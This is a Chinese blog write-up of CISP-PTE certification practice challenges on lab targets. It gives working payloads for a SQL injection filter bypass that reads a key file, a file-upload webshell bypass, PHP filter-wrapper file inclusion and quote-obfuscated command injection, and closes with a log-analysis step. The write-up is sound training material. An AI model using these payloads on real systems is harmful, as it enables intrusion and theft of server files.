起因
最近小迷弟想考个证书,问我cisp-pte证书怎么样,题目难不难。
竟然问到了我都知识盲区......
恶补知识
在网上疯狂搜索题目,你别说还真找到了。
打开一看还特么要收费,气的直哆嗦。
拒绝一切不合理收费
另寻他法
没办法了只能掏出我的神器
目标
第一题 sql注入
通过题目可知,就是利用注入读取/tmp/360/key
经过测试过滤了union关键词(采用双写绕过)
最终得到key
payload
x.x.x.x:81/vulnerabilities/fu1.php?id=-1') uniounionn select 1,2,load_file('/tmp/360/key'),4,5,6,7 +--+
第二题文件上传
这个题挺简单
直接上传图片马,修改后缀为cmd.phP(过滤了php)即可得到shell
第三题文件包含
一开始以为解题的思路在view.html,经过一番测试无果,后来发现是php伪协进行文件包含.
payload
x.x.x.x:83/vulnerabilities/fu1.php?file=php://filter/read=convert.b ase64-encode/resource=/var/www/html/key.php
第四题命令执行
跟dvwa 那个靶机一样的
payload
127.0.0.1| c'a't ../key.php
第五题日志分析
有27M 这么大
用记事本打开直接崩溃了
通过状态码可以过滤一部分
继续搜索 admin
发现可疑文件
admin/backdoor.php
结束
经过这些,可以回答小迷弟的问题了